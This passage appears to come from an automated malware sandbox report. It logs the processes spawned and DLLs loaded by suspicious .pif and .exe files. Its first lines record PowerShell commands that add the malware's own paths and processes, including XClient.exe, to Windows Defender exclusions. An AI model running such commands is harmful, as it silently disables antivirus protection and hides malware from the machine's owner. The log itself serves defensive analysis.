Source: C:\Users\user\Links\icqplewR.pif Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Links\icqplewR.pif'
Source: C:\Users\user\Links\icqplewR.pif Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'icqplewR.pif'
Source: C:\Users\user\Links\icqplewR.pif Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Source: C:\Users\user\Links\icqplewR.pif Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Source: C:\Users\user\Links\Rwelpqci.PIF Process created: C:\Users\user\Links\icqplewR.pif C:\\Users\\user\\Links\icqplewR.pif
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: textinputframework.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: opengl32.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: glu32.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: opengl32.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: opengl32.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: glu32.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: glu32.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: url.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ieframe.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: smartscreenps.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ieproxy.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: mssip32.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??????????.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ???.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ???.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ???.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??l.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??l.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ?.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ?.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??l.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ????.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ???e???????????.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ???e???????????.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ?.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ?.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ?.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ?.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??l.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??l.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: tquery.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: cryptdll.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: spp.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: vssapi.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: vsstrace.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: endpointdlp.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: endpointdlp.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: endpointdlp.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: endpointdlp.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: advapi.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: advapi.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: advapi.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: advapi.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: advapi.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: advapi.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: advapi.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: sppwmi.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: sppcext.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: winscard.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: devobj.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: apphelp.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: kernel.appcore.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: uxtheme.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: mscoree.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: wldp.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: amsi.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: userenv.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: profapi.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: version.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: msasn1.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: gpapi.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: cryptsp.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: rsaenh.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: cryptbase.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: sspicli.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: windows.storage.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: propsys.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: edputil.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: urlmon.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: iertutil.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: srvcli.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: netutils.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: wintypes.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: appresolver.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: bcp47langs.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: slc.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: sppc.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: mswsock.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: wbemcomn.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: avicap32.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: msvfw32.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: winmm.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: winmm.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: dwrite.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: msvcp140_clr0400.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: secur32.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: rstrtmgr.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: ncrypt.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: ntasn1.dll
Source: C:\Users\user\Links\icqplewR.pif Section loaded: windowscodecs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: opengl32.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: glu32.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: opengl32.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: opengl32.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: glu32.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: glu32.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: url.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: ieframe.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: netapi32.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: wkscli.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: smartscreenps.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: ieproxy.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: mssip32.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: ???.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: ???.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: ???.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: ??l.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: ??l.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: ?.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: ?.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: ??l.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: ????.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: ???e???????????.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: ???e???????????.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: ?.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: ?.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: ?.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: ?.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: ??l.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: ??l.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: tquery.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: cryptdll.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: spp.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: vssapi.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: vsstrace.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: endpointdlp.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: endpointdlp.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: endpointdlp.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: endpointdlp.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: advapi.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: advapi.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: advapi.dll Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Section loaded: advapi.dll Jump to behavior
